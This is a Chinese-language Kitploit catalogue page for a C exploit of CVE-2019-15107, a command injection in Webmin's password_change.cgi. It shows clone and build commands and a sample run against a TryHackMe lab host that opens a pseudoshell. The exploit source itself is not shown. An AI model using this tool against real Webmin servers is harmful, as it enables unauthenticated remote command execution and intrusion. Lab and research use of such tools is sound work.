Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-15107 — C 语言编写的 CVE-2019-15107 Webmin 漏洞利用 | Kitploit
工具/GitHubGitHub/whokilleddb/cve-2019-15107
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubwhokilleddb/cve-2019-15107

CVE-2019-15107

C 语言编写的 CVE-2019-15107 Webmin 漏洞利用

查看仓库
3114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-15107 Webmin 利用工具

CVE-2019-15107

在 Webmin <=1.920 中发现了一个问题。参数 old 在 password_change.cgi 中包含了命令注入漏洞。 [NVD]

编译

root@kitploit:~
$ git clone https://github.com/whokilleddb/CVE-2019-15107
$ cd CVE-2019-15107
$ make

使用示例

root@kitploit:~
$ ./exploit http://thomaswreath.thm:10000
[+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
[+] Target URI: http://thomaswreath.thm:10000

======Headers======
HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Date: Sat, 14 Aug 2021 23:40:01 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close

[~] The Given Server Is Running In SSL MODE
[+] Switching To SSL
[+] The Given Server Might Be Vulnerable To CVE-2019-15107
[+] The Given Server IS VULNERABLE To CVE-2019-15107
[+] Starting Pseudoshell
[+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
[+] To Exit, type: exit()

PS:这个利用工具是在我尝试 TryHackMe 的 Wreath Network 时制作的,因此这里展示的例子对应了该靶机。

常见问题

问:为什么用 C 而不是 Python3?

答:因为我是一个精神病患者

下载工具